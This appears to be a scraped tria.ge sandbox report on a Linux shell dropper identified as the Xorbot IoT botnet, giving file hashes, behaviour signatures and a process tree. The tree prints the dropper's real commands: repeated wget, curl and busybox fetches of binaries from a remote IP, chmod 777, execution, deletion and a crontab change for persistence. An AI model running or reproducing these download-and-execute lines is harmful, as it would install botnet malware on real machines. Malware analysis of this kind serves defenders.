Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    27/02/2025, 18:52

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    d8126e215a151514ecccbac0d89fa606

  • SHA1

    b1a73227b60aed5bec1dfb839fb3284e529c3f14

  • SHA256

    37a5a3e5ce57b6a774808847b27b716c7809d8da5349d0a6c0ed0d945fd9de45

  • SHA512

    c5fb3b89c403a94cb75a375c82d4f541f3d1d290dd37156449ed63ae0d5ffa578a951e9068f65c8a353bd8e482cb73305b19a7401302a703351b3d3540cc7f7a

  • SSDEEP

    192:NmZcq5vRAiAeAdAgAYA4bAiAeAdAgAYAuQn:Nm/5vRVxmnfTbVxmnfY

Malware Config

Signatures

  • Detects Xorbot 4 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 5 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 14 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:1521
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:1522
      • /usr/bin/wget
        wget http://37.44.238.88/bins/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
        2⤵
        • Writes file to tmp directory
        PID:1523
      • /usr/bin/curl
        curl -O http://37.44.238.88/bins/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
        2⤵
          PID:1527
        • /bin/busybox
          /bin/busybox wget http://37.44.238.88/bins/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
          2⤵
          • Writes file to tmp directory
          PID:1531
        • /bin/chmod
          chmod 777 v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
          2⤵
          • File and Directory Permissions Modification
          PID:1532
        • /tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
          ./v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
          2⤵
            PID:1533
          • /bin/rm
            rm v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb
            2⤵
              PID:1535
            • /usr/bin/wget
              wget http://37.44.238.88/bins/tZq2pUucDTcfj0bOnDclqm8m0Nt4dvZC73
              2⤵
              • Writes file to tmp directory
              PID:1536
            • /usr/bin/curl
              curl -O http://37.44.238.88/bins/tZq2pUucDTcfj0bOnDclqm8m0Nt4dvZC73
              2⤵
              • Writes file to tmp directory
              PID:1537
            • /bin/busybox
              /bin/busybox wget http://37.44.238.88/bins/tZq2pUucDTcfj0bOnDclqm8m0Nt4dvZC73
              2⤵
              • Writes file to tmp directory
              PID:1538
            • /bin/chmod
              chmod 777 tZq2pUucDTcfj0bOnDclqm8m0Nt4dvZC73
              2⤵
              • File and Directory Permissions Modification
              PID:1539
            • /tmp/tZq2pUucDTcfj0bOnDclqm8m0Nt4dvZC73
              ./tZq2pUucDTcfj0bOnDclqm8m0Nt4dvZC73
              2⤵
                PID:1540
              • /bin/rm
                rm tZq2pUucDTcfj0bOnDclqm8m0Nt4dvZC73
                2⤵
                  PID:1542
                • /usr/bin/wget
                  wget http://37.44.238.88/bins/HgiWiJcazuHxCVJKx3Msm68Aqsk5L4DlL8
                  2⤵
                  • Writes file to tmp directory
                  PID:1543
                • /usr/bin/curl
                  curl -O http://37.44.238.88/bins/HgiWiJcazuHxCVJKx3Msm68Aqsk5L4DlL8
                  2⤵
                  • Writes file to tmp directory
                  PID:1544
                • /bin/busybox
                  /bin/busybox wget http://37.44.238.88/bins/HgiWiJcazuHxCVJKx3Msm68Aqsk5L4DlL8
                  2⤵
                  • Writes file to tmp directory
                  PID:1545
                • /bin/chmod
                  chmod 777 HgiWiJcazuHxCVJKx3Msm68Aqsk5L4DlL8
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1546
                • /tmp/HgiWiJcazuHxCVJKx3Msm68Aqsk5L4DlL8
                  ./HgiWiJcazuHxCVJKx3Msm68Aqsk5L4DlL8
                  2⤵
                    PID:1547
                  • /bin/rm
                    rm HgiWiJcazuHxCVJKx3Msm68Aqsk5L4DlL8
                    2⤵
                      PID:1549
                    • /usr/bin/wget
                      wget http://37.44.238.88/bins/yGesduheCLIFGIBBB3ZqExQRBTt4uv96E8
                      2⤵
                      • Writes file to tmp directory
                      PID:1550
                    • /usr/bin/curl
                      curl -O http://37.44.238.88/bins/yGesduheCLIFGIBBB3ZqExQRBTt4uv96E8
                      2⤵
                      • Writes file to tmp directory
                      PID:1551
                    • /bin/busybox
                      /bin/busybox wget http://37.44.238.88/bins/yGesduheCLIFGIBBB3ZqExQRBTt4uv96E8
                      2⤵
                      • Writes file to tmp directory
                      PID:1552
                    • /bin/chmod
                      chmod 777 yGesduheCLIFGIBBB3ZqExQRBTt4uv96E8
                      2⤵
                      • File and Directory Permissions Modification
                      PID:1553
                    • /tmp/yGesduheCLIFGIBBB3ZqExQRBTt4uv96E8
                      ./yGesduheCLIFGIBBB3ZqExQRBTt4uv96E8
                      2⤵
                        PID:1554
                      • /bin/rm
                        rm yGesduheCLIFGIBBB3ZqExQRBTt4uv96E8
                        2⤵
                          PID:1556
                        • /usr/bin/wget
                          wget http://37.44.238.88/bins/A1I5LTjUrR72xQIhpWB1c23EaLpxnYghO2
                          2⤵
                          • Writes file to tmp directory
                          PID:1557
                        • /usr/bin/curl
                          curl -O http://37.44.238.88/bins/A1I5LTjUrR72xQIhpWB1c23EaLpxnYghO2
                          2⤵
                          • Writes file to tmp directory
                          PID:1558
                        • /bin/busybox
                          /bin/busybox wget http://37.44.238.88/bins/A1I5LTjUrR72xQIhpWB1c23EaLpxnYghO2
                          2⤵
                          • Writes file to tmp directory
                          PID:1559
                        • /bin/chmod
                          chmod 777 A1I5LTjUrR72xQIhpWB1c23EaLpxnYghO2
                          2⤵
                          • File and Directory Permissions Modification
                          PID:1560
                        • /tmp/A1I5LTjUrR72xQIhpWB1c23EaLpxnYghO2
                          ./A1I5LTjUrR72xQIhpWB1c23EaLpxnYghO2
                          2⤵
                          • Renames itself
                          • Reads runtime system information
                          PID:1561
                          • /bin/sh
                            sh -c "crontab -l"
                            3⤵
                              PID:1563
                              • /usr/bin/crontab
                                crontab -l
                                4⤵
                                  PID:1564
                              • /bin/sh
                                sh -c "crontab -"
                                3⤵
                                  PID:1565
                                  • /usr/bin/crontab
                                    crontab -
                                    4⤵
                                    • Creates/modifies Cron job
                                    PID:1566
                              • /bin/rm
                                rm A1I5LTjUrR72xQIhpWB1c23EaLpxnYghO2
                                2⤵
                                  PID:1568
                                • /usr/bin/wget
                                  wget http://37.44.238.88/bins/3fUGc9WqasGXQNOhtYw7GOI48MY8yxDgMt
                                  2⤵
                                    PID:1571

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • /tmp/A1I5LTjUrR72xQIhpWB1c23EaLpxnYghO2

                                  Filesize

                                  112KB

                                  MD5

                                  05d7857dcead18bbd86d2935f591873c

                                  SHA1

                                  34d18f41ef35f93d5364ce3e24d74730a4e91985

                                  SHA256

                                  2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

                                  SHA512

                                  d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

                                • /tmp/HgiWiJcazuHxCVJKx3Msm68Aqsk5L4DlL8

                                  Filesize

                                  107KB

                                  MD5

                                  eb9c3a0de91fcf16ba17cb24608df68c

                                  SHA1

                                  09d95a7d70d5e115d103be51edff7c498d272fac

                                  SHA256

                                  dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

                                  SHA512

                                  9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

                                • /tmp/tZq2pUucDTcfj0bOnDclqm8m0Nt4dvZC73

                                  Filesize

                                  151KB

                                  MD5

                                  3c90d5820bddcf7c5d1bd21dfa49d958

                                  SHA1

                                  5ba05bd489e50af97d6dc45e3a0be60e494d5083

                                  SHA256

                                  bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

                                  SHA512

                                  54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

                                • /tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb

                                  Filesize

                                  127KB

                                  MD5

                                  89077b7bd4bcafca7713be43635c4862

                                  SHA1

                                  fc02edb8fba29ea8ee99e6157ef8560334530052

                                  SHA256

                                  78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

                                  SHA512

                                  1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

                                • /tmp/yGesduheCLIFGIBBB3ZqExQRBTt4uv96E8

                                  Filesize

                                  122KB

                                  MD5

                                  cd3d4b9c643e5b473fb4d88ed05f0716

                                  SHA1

                                  64ee7a97418583d759eaea8000890cc3bae1b5f4

                                  SHA256

                                  0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

                                  SHA512

                                  164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

                                • /var/spool/cron/crontabs/tmp.DftbFz

                                  Filesize

                                  210B

                                  MD5

                                  784c1dbbd4655100e09da528aa2771c3

                                  SHA1

                                  fc13a876cf879f679e31c4e2d98d4cc72c1197c1

                                  SHA256

                                  609ecba216cdc30b559e5122d971b9c626ef0ebb8b40764fb2462cde16418b85

                                  SHA512

                                  ec5e2dde0ad46f66ed9cb6ec0f4a3fbc084315a85ade2aad0822c9a0ed986bd120423a674e8b4a8ed64ee078941e3beb8ffdec31544ff84450aab762d8ed44d1